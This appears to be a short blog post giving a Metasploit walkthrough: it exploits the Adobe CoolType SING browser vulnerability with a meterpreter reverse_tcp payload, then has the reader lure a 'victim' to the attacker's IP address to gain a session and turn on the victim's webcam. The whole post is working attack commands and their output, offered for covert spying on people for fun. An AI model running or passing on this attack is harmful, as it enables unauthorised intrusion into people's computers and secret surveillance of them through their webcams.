Wanna have some fun with Metasploit. Open the webcam of your victim and see how is he/she. :P
msf> show exploits
msf>use windows/browser/adobe_cooltype_sing
msf exploit(adobe_cooltype_sing)> set payload windows/meterpreter/reverse_tcp
payload=> windows/meterpreter/reverse_tcp
msf exploit(adobe_cooltype_sing) > show options
Module options (exploit/windows/browser/adobe_cooltype_sing):
Name
Current Setting Required
Description
----
---------------
-------- -----------
SRVHOST 0.0.0.0
yes The local host to listen on. This must be
an address on the local machine or 0.0.0.0
SRVPORT 8080
yes The local port to listen on.
SSL
false
no
Negotiate SSL for incoming connections
SSLCert
no
Path to a custom SSL certificate (default is randomly
generated)
SSLVersion SSL3
no Specify the version of SSL that
should be used (accepted: SSL2, SSL3, TLS1)
URIPATH
no
The URI to use for this exploit (default is random)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes
Exit technique: seh, thread, process, none
LHOST
yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(adobe_cooltype_sing) > set SRVHOST 192.168.0.58
SRVHOST => 192.168.0.58
msf exploit(adobe_cooltype_sing) > set SRVPORT 80
SRVPORT => 80
msf exploit(adobe_cooltype_sing) > set uripath /
uripath => /
msf exploit(adobe_cooltype_sing) > set uripath /
uripath => /
msf exploit(adobe_cooltype_sing) >exploit -j
Let the victim open your IP in his/her browser and when it will be opened, you will get 1 meterpreter session.
msf exploit(adobe_cooltype_sing) > session -i 1
and you will get the webcam of victim. :)
0 comments:
Post a Comment